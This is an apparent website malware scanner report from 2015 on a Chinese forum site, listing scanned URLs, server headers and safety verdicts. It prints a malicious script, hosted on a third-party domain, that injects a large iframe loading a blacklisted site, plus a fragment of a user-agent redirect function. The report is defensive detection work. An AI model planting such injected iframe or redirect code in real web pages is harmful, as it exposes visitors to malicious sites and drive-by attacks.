Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kav001.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kav001.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 18:02:01 GMT Location: forum.php Server: Microsoft-IIS/6.0 Content-Type: text/html X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 | clean |
http://kav001.com/forum.php | 200 OK Content-Length: 37939 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: atv222.kav001.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <title>www.kanav001.com-³ÉÈËÇø</title> <meta name="keywords" content="www.kanav001.com" /> <meta name="description" content="www.kanav0 ...[4425 bytes skipped]... | ||
http://kav001.com/static/js/common.js?bcP | 200 OK Content-Length: 69459 Content-Type: application/x-javascript | clean |
http://kvbjf.pw/bbs.js | 200 OK Content-Length: 1117 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.yuxiangwu.org document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowTransparency src=http://www.yuxiangwu.org/></iframe>");
function browserRedirect() { var sUserAgent = navigator.userAgent.toLowerCase(); var bIsIpad = sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs = sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp = sUserAgent.match(/midp/i) == "midp"; var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; ...[528 bytes skipped]... Decoded script: <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowTransparency src=http://www.yuxiangwu.org/></iframe> Malicious iFrame found. size: 100x2450 src: http://www.yuxiangwu.org/ This URL is marked by Google as suspicious <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowtransparency src=http://www.yuxiangwu.org/> | ||
http://kav001.com/static/js/forum.js?bcP | 200 OK Content-Length: 22720 Content-Type: application/x-javascript | clean |
http://kav001.com/static/js/logging.js?bcP | 200 OK Content-Length: 603 Content-Type: application/x-javascript | clean |
http://js.users.51.la/16946601.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://js.users.51.la/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://kav001.com/home.php?mod=misc&ac=sendmail&rand=1420999323 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1 | 200 OK Content-Length: 6173 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kav001.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 11 Jan 2015 18:02:01 GMT
Location: forum.php
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: kav001.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 11 Jan 2015 18:02:01 GMT
Location: forum.php
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: kav001.com
Referer: http://www.google.com/search?q=kav001.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kav001.com
Referer: http://www.google.com/search?q=kav001.com
Result:
The result is similar to the first query. There are no suspicious redirects found.